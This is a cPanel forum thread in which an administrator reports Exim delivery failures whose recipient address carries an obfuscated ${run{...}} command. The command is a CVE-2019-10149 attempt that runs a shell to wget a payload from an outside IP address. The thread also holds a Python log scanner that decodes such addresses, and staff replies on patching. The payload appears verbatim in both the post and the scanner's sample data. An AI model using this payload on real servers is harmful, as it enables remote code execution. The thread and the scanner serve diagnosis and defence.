m.eid
Well-Known Member
Jun 4, 2014
Jordan
cPanel Access Level: Root Administrator
Hi,
I've received three emails in delivery reports where the receiver email is a script:
Code:
root+${run{\x2fbin\x2fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f64.202.186.216\x22}}@hs01.domain.com
And the result column is "Permission denied: failed to chdir to /root".
Is this a risk I can do something about? Any recommendations?

*Note: We use ConfigServer scripts for exploit scanning and the FrontEnd Mail Scanner, which flagged it as high-score spam.
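As an added example (not part of the original thread or of any cPanel/Exim code), the following Python script decodes the Exim string-expansion escapes in a recipient address like the one quoted above and reports every recipient in an Exim mainlog excerpt that carries a `${run{...}}` expansion item. The only real data is the address from the post; the log lines, the `hs01.domain.com` host and the function names are constructed for this example. The decoder handles the `\xhh` hex, `\ooo` octal and `\t`/`\n`/`\r` escapes that keep spaces and slashes out of the address, and it matches braces by depth so nested `${...}` items and truncated addresses do not confuse it.

```python
import re

# Constructed sample: the recipient address quoted in the post above.
SAMPLE_ADDRESS = (
    r"root+${run{\x2fbin\x2fsh\t-c\t\x22wget\x20199.204.214.40"
    r"\x2fsbz\x2f64.202.186.216\x22}}@hs01.domain.com"
)

# Backslash escapes understood by Exim string expansion: \xhh, \ooo, \t \n \r,
# and "\c" for any other character c (which yields c itself).
_ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|.)", re.S)
_NAMED = {"t": "\t", "n": "\n", "r": "\r"}


def decode_exim_escapes(s: str) -> str:
    """Undo Exim expansion escapes so an obfuscated command becomes readable."""
    def repl(m: re.Match) -> str:
        tok = m.group(1)
        if tok[0] == "x" and len(tok) > 1:          # \xhh  -> hex byte
            return chr(int(tok[1:], 16))
        if all(c in "01234567" for c in tok):       # \ooo  -> octal byte
            return chr(int(tok, 8))
        return _NAMED.get(tok, tok)                 # \t \n \r, or literal
    return _ESCAPE_RE.sub(repl, s)


def extract_run_commands(address: str) -> list[str]:
    """Return the decoded command of every ${run{...}} item in an address.
    Braces may nest, so the closing brace is found by depth, not by regex."""
    cmds = []
    marker = "${run{"
    i = address.find(marker)
    while i != -1:
        start = i + len(marker)
        depth, j = 1, start
        while j < len(address) and depth:
            depth += {"{": 1, "}": -1}.get(address[j], 0)
            j += 1
        if depth:            # unbalanced braces: truncated or mangled address
            break
        cmds.append(decode_exim_escapes(address[start:j - 1]))
        i = address.find(marker, j)
    return cmds


# Constructed Exim-style mainlog excerpt (not taken from the post); only the
# first line carries a ${run{...}} recipient, the others are benign traffic.
SAMPLE_LOG = r"""2019-06-10 03:12:45 1hZabc-0001Fx-2Q ** root+${run{\x2fbin\x2fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f64.202.186.216\x22}}@hs01.domain.com: Permission denied: failed to chdir to /root
2019-06-10 03:13:01 1hZabd-0001G1-Aa => alice <alice@hs01.domain.com> R=virtual_user T=dovecot_virtual_delivery
2019-06-10 03:14:22 1hZabe-0001G7-Bb <= bob@example.net H=mail.example.net [192.0.2.10] P=esmtp S=1432
"""

# A recipient token: no whitespace or angle brackets, contains ${run{, then @host.
_ADDR_RE = re.compile(r"[^\s<>]*\$\{run\{[^\s<>]*@[^\s<>:]+")


def scan_exim_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Report (line number, offending address, decoded commands) for every
    log line whose recipient carries a ${run{...}} expansion item."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for addr in _ADDR_RE.findall(line):
            hits.append((n, addr, extract_run_commands(addr)))
    return hits


if __name__ == "__main__":
    for n, addr, cmds in scan_exim_log(SAMPLE_LOG):
        print(f"line {n}: {addr}")
        for c in cmds:
            print("  would run:", repr(c))
```

Run it against a real mainlog with `scan_exim_log(open("/var/log/exim_mainlog").read())`; the decoded command (here `/bin/sh -c "wget ..."`) is what the attacker hoped the server would execute, which is the useful artefact to keep when filing a ticket or checking whether that host was ever contacted from the server.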
 

cPanelMichael
Technical Support Community Manager
Staff member
Apr 11, 2011
cPanel Access Level: DataCenter Provider
Hello @m.eid,

That looks like an attempt to take advantage of the exploit noted in Exim CVE-2019-10149. If so, the attempts will fail as long as your server was updated (see the link in the previous sentence for more information) prior to the attempt.

If you're concerned your system may have been hacked, feel free to open a support ticket and we'll take a look.

Thank you.
 

cPanelMichael
Technical Support Community Manager
I have version 80.0.20, which I think is updated Exim, so no risk from these kinds of scripts?
Hello @m.eid,

Version 80.0.20 is protected against CVE-2019-10149 specifically. However, "no risk from these kind of scripts" is too broad a term when it comes to security. Here's a quote from our How To Clean A Hacked Server document that explains why:

To put it as succinctly as possible: without knowing every action that has ever taken place on a server, it is impossible to prove that the server is completely clean. While it is simple to show a compromised server, showing the opposite, for all intents and purposes, is not.
Thank you.